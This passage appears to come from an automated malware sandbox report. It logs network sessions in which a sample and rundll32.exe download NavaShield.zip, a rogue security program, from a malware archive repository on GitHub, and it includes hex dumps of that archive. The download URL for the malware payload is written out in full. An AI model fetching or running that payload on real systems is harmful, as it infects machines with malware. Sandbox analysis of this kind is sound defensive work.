                                                                                                                                                            2022-09-29 12:45:14 UTC17391INData Raw: c0 ab 4d 5c f3 b4 71 04 a1 55 7f 97 cf 7d a3 01 9b 72 52 0b e4 61 27 f1 9b 25 be 73 a2 d9 a3 50 99 ef 92 1d de 0b ff c9 eb ef 22 ba 4f 55 36 b1 74 c9 26 5c 9f 8e 12 b4 8f 08 d9 7b 85 c1 34 93 0b e7 25 67 25 8b 82 92 62 e1 d9 ce 31 6c 1d 88 62 ed d8 5b a0 9c 9d b9 1e 9f 51 6f 62 cd 88 e6 de 74 61 d3 d4 52 ed 0e 3d 84 40 bf 34 9d a0 d6 08 da fd 75 e9 8b fb 8c 23 cc 33 1f bb b1 d0 92 33 06 a6 20 e9 49 7a 97 dd 1c ee 80 a0 40 d2 20 87 09 8a 7b c7 99 6c bf 14 7b 79 e6 af ed 1b 20 5b 26 5a 13 08 db 2a b6 50 4b 4a fb 64 d5 99 7d 13 8d 89 ba d3 a8 58 00 64 6c 6c 32 1c 5c 1e 47 83 f4 70 41 d5 34 d7 ad aa e2 59 ec 04 ba 7d 99 e3 7d fa 83 7a 8b 01 ab 6e 17 2b a5 cc c8 9f 1e e4 6d 17 c6 e2 0e 9c 9f ef b4 32 88 3e 23 cc 12 02 f1 fa ff 8d 18 45 a4 08 67 39 3b 81 93 f4
                                                                                                                                                            Data Ascii: M\qU}rRa'%sP"OU6t&\{4%g%b1lb[QobtaR=@4u#33 Iz@ {l{y [&Z*PKJd}Xdll2\GpA4Y}}zn+m2>#Eg9;
                                                                                                                                                            2022-09-29 12:45:14 UTC17407INData Raw: f5 5d 5f b9 2c bf 4d 95 0c 04 1a c0 71 6c 14 4c c1 a3 12 52 a6 5c 0c 9f 55 7d aa e2 5b 61 53 55 43 b9 b8 4a 3e 3a bd 63 cf a9 8e 1b 20 2d ba 1c 0f 1e 8c 77 76 66 df fb 0b 24 fd ef bb 4c d4 4e f9 fd 9f 3d d0 50 6f ad 52 11 eb 56 f6 4a 74 3f 46 41 46 a7 0d 30 9b 19 8f 80 4a 22 40 61 b9 50 2a bb d2 e1 9b 41 f6 4c ce 0b 0b 0d 5a a8 4b 6f 19 a8 1f 3e 10 d0 03 c2 ea 05 2f 05 e8 a1 c8 2c ab 80 d8 c6 78 33 9e cc e6 9e 85 99 67 10 c6 d7 64 d5 a9 26 99 df 85 56 d1 de e2 07 bc 79 aa 00 41 16 25 bb c9 15 2d b9 44 a3 52 f7 ce 38 51 5e 60 0e b7 91 81 e5 11 6b ad a7 49 46 17 cc 5c 71 e9 db 0b 40 d2 17 0a d8 2c 88 07 cc 26 79 12 33 db 1a 0c 80 1f af 81 0a d8 07 21 2f cd fb 76 38 27 ee 9c 0d 4c c3 e0 ad 17 44 f8 0e fc af 63 c7 63 c5 2a c3 41 dd 40 cd 68 7a f2 8c 5e 9b c5
                                                                                                                                                            Data Ascii: ]_,MqlLR\U}[aSUCJ>:c -wvf$LN=PoRVJt?FAF0J"@aP*ALZKo>/,x3gd&VyA%-DR8Q^`kIF\q@,&y3!/v8'LDcc*A@hz^


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            94192.168.2.649755140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:14 UTC17415OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            95140.82.121.4443192.168.2.649755C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:14 UTC17416INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:54 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/NavaShield.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:14 UTC17416INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            96192.168.2.649756185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:14 UTC17418OUTGET /Endermanch/MalwareDatabase/master/rogues/NavaShield.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            97185.199.110.133443192.168.2.649756C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:15 UTC17418INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 9761692
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "661ea63fbc62342073d5bfd4679b232432b87a10a3c0d0671861822eaa1ccd08"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0813:A32C:790B7E:86A2B4:6335935A
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:15 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6952-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455514.490492,VS0,VE588
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 035808b70319a5ee22a4fb2af6bc25586265d785
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:15 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:15 UTC17419INData Raw: 50 4b 03 04 14 00 01 00 08 00 46 7f 97 48 0d c4 ec 04 e4 f2 94 00 b9 d8 9a 00 19 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4e 61 76 61 53 68 69 65 6c 64 2e 65 78 65 cf 6d a1 a8 22 51 3b 7e 26 d3 2c d3 1e d3 0f fb 79 9a a0 19 5b 88 9d ad 57 3c df ac ba c9 c7 af 6e 26 53 32 38 24 ff 4c 32 e8 99 fc 7f 63 d8 b0 1c 6b 08 5a ad 3a 8d 5f 20 c0 7d d9 f8 6c a1 e0 0c e0 af 4f c5 c6 96 99 cf 52 28 92 1b 51 3a 4c de d2 c6 ea 72 65 b9 81 6f 90 13 e4 53 07 93 1a 71 b9 c4 17 e7 c7 e2 19 e0 31 8e f5 01 84 f2 1f 17 51 b4 f7 93 05 87 81 fd ea 83 25 01 65 8c 97 67 30 bd 7f 9d b2 6e 12 d5 a8 48 7b fd 6f ca 41 88 1c e6 7e d9 86 28 f2 74 56 23 19 f7 76 1e 92 7d 53 7a 0e 88 c3 c1 08 86 65 d1 fb 1b 61 d9 41 53 0a 20 d8 ef 78 d0 0a 9e d1 05 9c 45 58 25 42 54 b0 9f 14 29 b9 0f 06
                                                                                                                                                            Data Ascii: PKFHEndermanch@NavaShield.exem"Q;~&,y[W<n&S28$L2ckZ:_ }lOR(Q:LreoSq1Q%eg0nH{oA~(tV#v}SzeaAS xEX%BT)
                                                                                                                                                            2022-09-29 12:45:15 UTC17420INData Raw: 98 c1 2c c7 f5 4d df 6f e0 4f 36 e3 32 59 08 3c 73 9c b0 4f 3c 96 0c 00 b0 7e c4 2e 60 fe 58 35 c8 81 e6 77 5e 1a 1d dc 83 70 7f 85 67 4d a8 f7 59 72 09 74 24 12 95 b7 96 20 54 96 0d b0 73 a4 96 db 52 29 46 c6 f8 4c 77 d5 a3 eb 7d 6d e3 db 1d 87 c6 17 99 af 56 d1 0a 6b 90 a7 19 ed 19 87 44 9c 89 3f a9 20 8b 3e 0d ae 59 ab 91 2a 03 3d 9f 1c 7f e3 57 0b 0e 05 d8 92 92 2b ca 3d 50 fa b2 bb a1 85 3a 08 be 9a 6c 5c 71 36 be e6 54 c8 ef a0 21 7d e7 03 01 e0 16 6f b0 f9 c2 35 b4 d7 d5 34 8d d8 0f 80 e6 d7 3a bc 2d cc 9f a4 2f 68 6f 94 50 cb b9 0e ba ec 42 71 a0 6d b8 f5 ad a2 c5 33 a3 cf cc bd 51 4b e6 36 1e 1a fb ab 39 ef c6 e7 be b2 cf 0c f6 a3 e6 c1 f4 18 db 40 85 64 12 93 1c bb 34 bf af de 2f 07 22 e4 44 10 af 72 d6 e1 a2 14 a1 83 75 d3 df 6c 8f db b7 04 41
                                                                                                                                                            Data Ascii: ,MoO62Y<sO<~.`X5w^pgMYrt$ TsR)FLw}mVkD? >Y*=W+=P:l\q6T!}o54:-/hoPBqm3QK69@d4/"DrulA
                                                                                                                                                            2022-09-29 12:45:15 UTC17422INData Raw: 22 ec 80 dd e1 4c e2 c7 2e 16 61 84 3c 31 e7 5d d6 95 0b 86 e9 06 58 a7 80 71 3e d0 63 3b 81 05 4b aa ae 38 4d e8 02 3b bb 4b 24 0d 94 28 e0 28 35 d4 2a 38 63 a9 a2 50 86 99 7a 92 36 02 19 e7 e6 87 6d 58 82 0e 62 72 fc 9d d2 12 99 83 4a 6c 26 7b 97 4d f4 be b6 d2 b1 4f a1 79 da d0 ee ca 48 1c b9 71 c0 75 b3 fd 02 d3 33 c4 84 6b 2e e1 e4 da e6 72 9f 3d 86 de b5 69 53 17 47 b4 31 d4 18 ca a2 d0 f9 0b 74 54 41 06 44 ff c0 e4 b7 d5 58 2c ae 59 24 20 a4 53 b6 b9 88 bd ae 6b 08 f8 eb 68 cf f6 b5 f2 9b 26 87 48 69 ee 89 1a 38 f5 a9 ac 8f 4f 87 bd 16 73 1a 7b ee ec 4f a2 e0 d4 46 21 12 2c 2f 20 9a 43 19 b4 31 36 83 2e c0 26 86 ad 4c 4e 6d e1 7e e4 59 ef 30 b7 2d d6 5b 96 b7 87 30 1b b9 78 49 73 f4 47 b0 19 ae 2e d9 82 50 97 18 06 b9 78 fa bc 29 28 d5 24 51 08 f8
                                                                                                                                                            Data Ascii: "L.a<1]Xq>c;K8M;K$((5*8cPz6mXbrJl&{MOyHqu3k.r=iSG1tTADX,Y$ Skh&Hi8Os{OF!,/ C16.&LNm~Y0-[0xIsG.Px)($Q
                                                                                                                                                            2022-09-29 12:45:15 UTC17423INData Raw: e0 94 d5 85 66 c2 03 d9 9b fa af cc 2f 79 ae 29 59 53 67 c5 9d 64 1d 80 c2 34 24 74 e9 fa 9d 6f d5 1b d9 96 b2 32 9d 76 d4 2f 94 b8 cc 25 28 a9 41 46 a8 d3 0c 2b 75 68 2a 30 d5 bf f2 a3 b0 01 6f 5e b3 b4 47 27 1a 2f 1f ee 65 b4 85 96 c1 b3 5e 64 62 8f 7a 53 8b 6f df 2a 2a 1f 87 43 54 41 47 5d 16 8a 1b 0c 6e d7 36 6a fd df 74 a0 f9 e9 a3 f9 f9 2f d1 df 67 bf ff b5 76 25 54 5a 87 a3 34 79 ee f1 aa 49 e5 32 5d 98 e4 44 88 3e 23 ff 0d 57 b5 27 42 0f 32 ac f2 e1 b8 07 a4 55 35 e9 d5 43 45 dd 78 e4 8a cd 00 52 e4 95 d2 92 df 6f f7 b3 50 c4 32 06 0f 88 63 03 22 97 69 4b a6 00 ce 93 b6 9c de 9a c0 bd 85 ef bf e4 3e bd d8 27 91 df 1e 20 f6 7c 3e f3 1d 84 8c 92 fd 05 9c 00 46 39 ad 6c 5a 67 37 b0 d1 c2 84 6f 40 d4 5a 94 24 bd df d7 43 f1 fa 22 79 81 d5 e4 6b 0f f6
                                                                                                                                                            Data Ascii: f/y)YSgd4$to2v/%(AF+uh*0o^G'/e^dbzSo**CTAG]n6jt/gv%TZ4yI2]D>#W'B2U5CExRoP2c"iK>' |>F9lZg7o@Z$C"yk
                                                                                                                                                            2022-09-29 12:45:15 UTC17424INData Raw: 82 6d 7d a0 ef b4 49 0f e6 23 ae 24 78 59 07 6f 66 d1 f3 dc 1b 51 04 f1 14 82 39 f5 a3 4b 3b 50 d4 2b a4 a1 ba 0d 92 37 46 44 2a 62 d1 9a b6 d5 e9 73 20 70 dd a9 94 b2 9c f4 60 8e d5 e3 b6 9a 99 7a 7d 81 22 15 b9 cf 76 2a 72 ef 22 0d 5d f9 c2 65 70 f6 b6 1d b4 3d 39 f4 23 da c3 ed bb a1 7e ac 78 4a b9 4c 6c 77 2a 8c 68 ce 80 ec af 5a 74 15 b4 89 7f 3b 64 f4 ed 93 5f b6 7c 4f 5b f4 4c cc 37 fc 43 16 f9 9a 4a 7c b1 aa 21 60 a1 ea a7 73 37 9d 69 7c d8 0e e5 8d 09 35 6d 0e a5 c9 6a b9 ab f8 75 78 f8 7a ba 6e a3 87 5b f0 b8 8b 2d 7a 2e c1 9d e6 7e f9 25 01 27 b1 89 e6 22 42 ff 1d 1f 43 b2 31 61 a6 6e 77 e3 c2 b6 9a c4 53 32 87 ab df b9 04 6a 73 50 ed 31 d9 90 fe dc 5e 48 b1 7f cc a9 d5 74 f8 74 a2 cb 05 95 33 be 5c e1 f9 ce 39 1a cf 4e 55 cb 49 28 78 4f 51 d7
                                                                                                                                                            Data Ascii: m}I#$xYofQ9K;P+7FD*bs p`z}"v*r"]ep=9#~xJLlw*hZt;d_|O[L7CJ|!`s7i|5mjuxzn[-z.~%'"BC1anwS2jsP1^Htt3\9NUI(xOQ
                                                                                                                                                            2022-09-29 12:45:15 UTC17426INData Raw: 06 60 a3 fe fb 7f 42 9e 3f 01 00 11 e3 6d d0 ca 24 a0 bc 71 91 9d cb e9 e4 05 a3 a2 a1 c6 40 ae 11 c7 50 19 5f 75 30 7f 63 35 d8 18 22 c4 f5 a6 6e eb 08 dc 3f 7e 69 20 e3 31 d5 13 13 7d 34 3f f9 3e de d0 d9 fe 1a 57 9c 2b 79 5e 7a 82 cd 77 24 ef 8d bc 44 ff 81 44 1b f5 fd 3a 07 7e 56 0a 4e b9 4d 00 f9 3d 3d 68 9d 95 a7 78 3b a5 2e 69 9f 29 33 84 6d 6f 9c 93 8d 58 e6 f4 a9 7f f5 1a b3 d8 13 36 84 c7 b4 d3 ab 1d 66 66 85 d2 1d 9b bd 93 1b cd 53 55 28 d4 99 c0 0d d0 22 08 40 77 d0 5a fb 63 2f 9d 66 82 68 7d 64 f3 40 30 46 4a ee 72 69 0e 3c b3 24 26 b6 ff a6 a9 7b f6 6f f4 05 7a 8e 0c 6c 4c b8 6a 65 c2 7f d2 58 f6 d3 c8 b6 f7 c2 dc 5f 7b 12 e8 a5 df ce 3e 55 d1 de 65 29 f2 26 03 a9 7a 32 1c 64 93 b0 49 40 e5 40 d8 e1 7e ee 86 e8 d1 34 68 d2 5f 77 b0 c7 cc 23
                                                                                                                                                            Data Ascii: `B?m$q@P_u0c5"n?~i 1}4?>W+y^zw$DD:~VNM==hx;.i)3moX6ffSU("@wZc/fh}d@0FJri<$&{ozlLjeX_{>Ue)&z2dI@@~4h_w#
                                                                                                                                                            2022-09-29 12:45:15 UTC17427INData Raw: 63 29 a3 6a d1 b5 12 69 9d b6 e0 0b 8e 38 63 95 1f 15 d5 ca 9c e8 38 d6 43 18 a2 bf 32 be f8 f5 29 68 0b a3 75 2f c3 10 a0 2c a1 6a bc 33 03 5f cf 24 e6 e1 e2 2d d9 d7 76 07 3b aa 1c 78 63 dd cb ab 10 71 9d 0e 4e 22 1a 3e e7 c9 67 24 54 d2 0d 14 3e 4a d3 77 5d 90 86 6c a6 b1 b5 e0 bc 62 1d 91 5c 25 bf 66 5e dd de e8 58 d3 c8 b8 6b b3 82 c7 1e d5 3d d6 70 d9 56 44 13 29 26 22 6b e2 27 57 e4 c3 cd a5 9c cc 16 e5 0d 9d d9 74 86 e5 d2 04 ad 3a 78 a7 c7 b9 d8 44 d5 b6 0d 39 4b be bb fc b9 dd 9c 7b c4 49 f6 fb 12 28 76 6c 2e e0 6e bf 3b 32 53 63 02 e6 4b e3 89 16 dc 87 43 d6 9f 49 0a 21 7c 73 04 e1 15 1c a6 90 1b 1a 95 d9 1a ab b8 43 78 8f fa 80 ca 19 fe 80 47 5a eb 17 93 0b d7 ed 84 7c ac 76 41 4b a0 20 9c 21 dc e8 dc 0d 79 a5 8a ea 41 58 ce ab f7 92 d5 7f fd
                                                                                                                                                            Data Ascii: c)ji8c8C2)hu/,j3_$-v;xcqN">g$T>Jw]lb\%f^Xk=pVD)&"k'Wt:xD9K{I(vl.n;2ScKCI!|sCxGZ|vAK !yAX
                                                                                                                                                            2022-09-29 12:45:15 UTC17428INData Raw: 09 b1 bb 1c 33 cd 0f eb 9f 30 bc 33 dc d5 8b f7 31 52 34 e7 be 92 0c fb 57 be 6f b5 8b 0f f9 81 03 93 a7 d0 ca 7e bb 46 41 ef 6a b2 32 3e f9 8e 40 9c 86 50 4d a5 a9 af 29 1d 94 1a 8f d0 a3 17 07 0f 9f d3 54 4d 71 35 65 b8 84 59 8f e1 cb c4 45 3f 4c 15 be b9 3f 3f 07 d3 cb b5 ab 22 ba 8b 16 96 76 ed ea 08 da 32 52 d2 6b ce b3 c1 b3 52 e5 46 70 1e 83 09 9c 24 6e 20 9a 4d 1b 44 74 0e fd 15 a0 ac 9b 95 b0 cc 36 10 91 32 04 42 b2 a6 a2 f0 d8 43 8f 5a 38 46 90 56 36 68 c5 eb bb 9b f6 66 53 92 bf f4 f3 de f8 01 96 2c f0 7b 7a 35 2d 2d 9a 59 69 b9 a9 b6 33 fb 9c f6 c3 3c d6 d1 f1 5c 0f 0f b5 4d be d5 c3 62 5b 31 e7 b6 f9 45 6b ad 5f 14 27 9a b3 b2 e7 19 1f 06 6a 8b 5e 2e c9 76 5f 88 5d a2 eb 35 3b 4f ac 65 9a a9 35 26 c5 f9 5b db dd 6f 2d b4 da ab b6 b6 81 a1 1a
                                                                                                                                                            Data Ascii: 3031R4Wo~FAj2>@PM)TMq5eYE?L??"v2RkRFp$n MDt62BCZ8FV6hfS,{z5--Yi3<\Mb[1Ek_'j^.v_]5;Oe5&[o-
                                                                                                                                                            2022-09-29 12:45:15 UTC17430INData Raw: e0 aa 1b b1 33 18 25 96 f1 9e 0e ca 11 03 66 be 0a 37 41 59 90 d8 cd 7b f8 85 94 c8 a7 1f af 3d a1 16 47 5f f9 e8 c0 60 4c 55 79 8d 1b db 8b 2a 52 2e 25 26 b4 76 7c 37 cf d1 5c a0 7c 29 60 b1 c3 79 08 4c 97 35 05 ac 2e 9d b5 2a 47 1d 55 d7 c1 97 e7 9a fc 1c fe fb 21 9f 0a 2d 2c e2 62 70 ea cb 98 cf c6 f1 41 c3 87 f6 aa c3 ee ca f7 e1 05 b5 b9 30 b3 aa 65 cc ff e0 72 b5 36 ee 16 e3 49 ab 4f e1 3f 89 00 37 c1 ed e2 68 e7 88 a0 9e fc 19 1f 80 3c 98 80 d5 09 e1 7c c3 67 56 18 f8 da 51 55 b6 4c c9 27 2c 12 72 bf 4a 16 20 84 58 8c c5 e8 c4 31 c2 2e af 99 8c 99 cc 0e 05 fb 30 27 9a 10 f4 07 93 10 1b 6f f6 ef b3 36 f2 fa 9b c6 89 fe a1 50 ea 92 45 a7 8e b6 d8 d2 9f 43 87 3f 49 c2 16 ef fe 06 99 45 95 6c 9c 97 a9 1e 0e 16 22 42 bb db d1 58 b1 7d e5 fb 3c 84 3d c2
                                                                                                                                                            Data Ascii: 3%f7AY{=G_`LUy*R.%&v|7\|)`yL5.*GU!-,bpA0er6IO?7h<|gVQUL',rJ X1.0'o6PEC?IEl"BX}<=
                                                                                                                                                            2022-09-29 12:45:15 UTC17431INData Raw: 19 7e a0 d5 3d 39 f0 b9 1b fd 8f 5e c4 57 19 a5 52 4d 4d 29 0e 84 e8 9d 26 59 32 ef c7 c4 8f 93 e6 a7 6a 00 41 0f 08 9a 51 b2 d9 79 26 e1 49 c7 72 4d 2f 49 de fc 8d 9a ad 49 89 73 79 79 68 50 d8 cf 76 d2 c6 e9 f8 2a 27 6c 66 02 0b 7a 67 5e 23 8d 16 50 ce 84 43 b3 e5 44 c8 cc a0 9c c9 62 00 d7 5b dd e8 ca f7 09 8f 0d 14 16 d2 30 8a 44 4d f1 40 c0 18 24 f9 c9 3c de a8 a6 65 58 0f f6 2d 59 07 a2 8d 76 e9 14 de f1 1c ba ce f4 0e aa 68 a6 e2 33 d1 0e 94 ff be f3 f8 7e 65 17 1d 50 23 8e e3 51 9d 4a a8 bb e6 4e 11 db 8b df 3b 4a 6b 7f df e3 26 35 5f 0f 39 a7 ee 5c 67 9b eb 2d 4f 14 07 df e7 d4 10 31 cd 2f 95 62 8d f7 79 e7 28 32 78 73 f4 2f 64 55 1c fe 07 f7 e7 ed f5 36 9d 23 21 f4 d5 82 57 6f 7d 1f 13 11 87 b4 32 33 78 49 c9 20 50 eb f0 35 0f 8b fb 16 20 79 46
                                                                                                                                                            Data Ascii: ~=9^WRMM)&Y2jAQy&IrM/IIsyyhPv*'lfzg^#PCDb[0DM@$<eX-Yvh3~eP#QJN;Jk&5_9\g-O1/by(2xs/dU6#!Wo}23xI P5 yF
                                                                                                                                                            2022-09-29 12:45:15 UTC17432INData Raw: 20 85 c3 8c 81 53 cf 14 19 b7 07 80 c0 90 73 9a 19 05 b8 c6 58 07 4a 16 94 80 29 cb d4 60 ce 7f 51 88 36 1e 4a 9f 4c 43 4d cb 1a 3a 29 79 d0 78 3b f2 e4 49 ec 3f e8 ec 2d 1f 68 13 ec 5d f7 39 18 cb ce e5 a1 35 c0 06 06 5a 03 9e 84 20 38 63 66 0b 5f b4 f3 6f 33 c2 80 1b 28 bd 32 f0 26 ff 8a 8d 87 bc 7d c3 c9 ab 67 c5 2e ed 9d e0 8e 93 db dc cf db b0 5e 56 5e fd 2c 88 41 16 8d 71 2f 76 c0 2c 08 8c 3d 2d 97 b5 c7 f2 4c a4 a1 be a3 10 4e 83 55 0a 97 c5 d3 38 72 7b 21 50 73 d2 37 89 33 f6 36 f2 e4 96 53 57 33 b8 cc a3 94 24 43 d9 5b 37 3e 0c cd 9d b9 ce 9a a3 fc 60 1f ef a5 0c 4b a3 58 bd a1 9f 10 2e ff 6c 2b 4a cc d7 3c 03 4c 3d 25 cc ff 41 38 b1 de 30 f0 76 1c 10 a3 1c 01 71 01 ba 4c 11 e7 56 f2 d0 65 3e 35 c6 42 37 2e d5 5a 20 fd 1d cf c5 10 30 9b c9 c4 e4
                                                                                                                                                            Data Ascii: SsXJ)`Q6JLCM:)yx;I?-h]95Z 8cf_o3(2&}g.^V^,Aq/v,=-LNU8r{!Ps736SW3$C[7>`KX.l+J<L=%A80vqLVe>5B7.Z 0
                                                                                                                                                            2022-09-29 12:45:15 UTC17434INData Raw: f0 9a 45 08 91 a0 8b 78 51 66 e1 27 17 ec 51 96 86 ad 43 e5 6c 37 c4 2b 4d fe 95 ab 6b 26 1b b4 5d 60 46 e9 5d 0c 1b 42 5b 5d 72 68 6f 47 74 5c 3d 65 d2 da 98 0c 50 ea a6 39 6a 0d 15 d5 c0 fd 8e 58 0d 40 fe 9a 81 bd 16 f2 17 e9 02 69 4a 3e 90 66 d9 7b 8d f4 c1 8b 68 e5 bc b1 e9 45 4f 40 d4 95 ba 77 78 20 d3 f6 3e 67 a9 e5 fb 2b d9 da d2 dc e5 de 9d 87 a2 17 ac 08 db a2 4a 79 67 34 59 38 bb 2b b4 6d f3 e2 55 73 bc 66 62 92 03 81 cf 2a 94 dc 92 ea ec 07 26 a6 c3 0c 3d ca aa 62 af 4f 21 b8 d6 17 63 23 79 d5 58 47 a9 eb 35 c7 9d 66 99 de 66 a6 b1 ed da ae d1 59 13 25 e8 63 1b 2e 21 df b6 79 13 94 d6 ea 37 7b df 00 d7 a4 5d 26 ca 41 29 d9 11 58 01 23 1d 4a 24 89 9c b5 90 98 8f b0 cc 80 e0 86 53 d4 7b 16 e1 ff 42 5b 07 a5 9e b6 34 ea 1e 06 4e 75 b1 aa ee c7 89
                                                                                                                                                            Data Ascii: ExQf'QCl7+Mk&]`F]B[]rhoGt\=eP9jX@iJ>f{hEO@wx >g+Jyg4Y8+mUsfb*&=bO!c#yXG5ffY%c.!y7{]&A)X#J$S{B[4Nu
                                                                                                                                                            2022-09-29 12:45:15 UTC17435INData Raw: 77 c7 aa 3a 1e 51 63 d2 ad 4e d2 aa d1 09 bb 94 7e b6 03 8f 5f 51 f2 3b 2b ef ce 28 b0 39 3c 0a 5a c7 a7 ea 32 4c 80 b6 43 ec 50 92 df 07 a5 0c 95 c9 03 ce b9 90 12 85 34 c7 f7 23 a8 98 bd 1f b3 0a 25 e3 c6 a3 2d b7 ff 57 e1 7a eb ca e5 28 bb 11 f3 d0 6c 58 9a 30 58 d7 03 4d 60 53 e6 42 ff 55 3c 8c d5 09 51 ab f6 dc 0f 73 3a 56 09 15 33 a2 33 12 93 8d 90 7b 3b f9 32 e3 4e c6 db 36 f7 81 e9 4c 2f 3b b1 41 64 23 02 51 26 25 79 e9 5b d2 25 7c a6 c2 78 8a b2 17 cf c0 7c 3f 05 a0 7a 21 5e 9e fc 8a bc 60 ab 96 41 85 61 1e 6e 12 14 d9 3a 7b c5 c1 28 80 09 e7 08 e5 de d9 aa f1 7f 29 e5 ea 91 db 65 3f 21 89 9d e5 1e 37 8e d4 b1 7f 56 ea 9c 0e b7 a2 41 f7 ff 63 93 e9 92 35 20 cb 48 45 c0 6f 73 b5 ec 9f 1b dd 00 0e a3 6e 06 89 99 e6 85 bd e6 50 05 fa ab 48 f5 10 27
                                                                                                                                                            Data Ascii: w:QcN~_Q;+(9<Z2LCP4#%-Wz(lX0XM`SBU<Qs:V33{;2N6L/;Ad#Q&%y[%|x|?z!^`Aan:{()e?!7VAc5 HEosnPH'
                                                                                                                                                            2022-09-29 12:45:15 UTC17436INData Raw: 75 40 d3 03 94 1c ae eb 49 49 d2 95 59 89 b2 0f ff 49 d4 c9 e7 15 e9 e2 aa f3 15 60 61 3d ab 1a 66 10 79 e2 9f a0 2d fc 9f 65 74 d7 a4 a0 ce b2 e6 b4 a6 be 7c 09 45 6e 92 d8 00 eb 50 38 69 d1 e7 e3 e7 1a a2 a0 f8 a5 c1 9d 2a 14 3c 0b 81 0d e7 c3 cb a2 0b 27 44 0d 75 e2 6b 62 b5 55 2b 89 92 d4 3e ed fa 1d c4 2d 96 14 4f 71 bf e5 73 2c 9b a7 77 95 81 bd 65 30 a7 c3 33 cc ce f9 d8 73 f8 68 32 a5 0e 5e 81 34 7d a1 11 63 0d 1e 0e e5 2e fa eb de c3 8a 1a b4 2b da 99 43 0f 67 e1 a6 0d da 2c 42 46 e7 a1 e8 63 09 0e d0 37 4d 8b e3 ca 99 88 5a f0 ef 60 63 cc f7 33 c5 39 ac f9 82 4b 83 35 dc ef c3 81 cd 8e d0 1a e0 ac ac f8 f4 4b c5 a8 c3 52 0d 97 ca 41 a8 f9 b4 54 20 3b 92 f0 88 24 d5 94 77 f1 31 b3 82 94 7e ea c8 69 f2 b5 ba f3 f0 4a bb 4a ec d7 6b 97 fc fd 2d a3
                                                                                                                                                            Data Ascii: u@IIYI`a=fy-et|EnP8i*<'DukbU+>-Oqs,we03sh2^4}c.+Cg,BFc7MZ`c39K5KRAT ;$w1~iJJk-
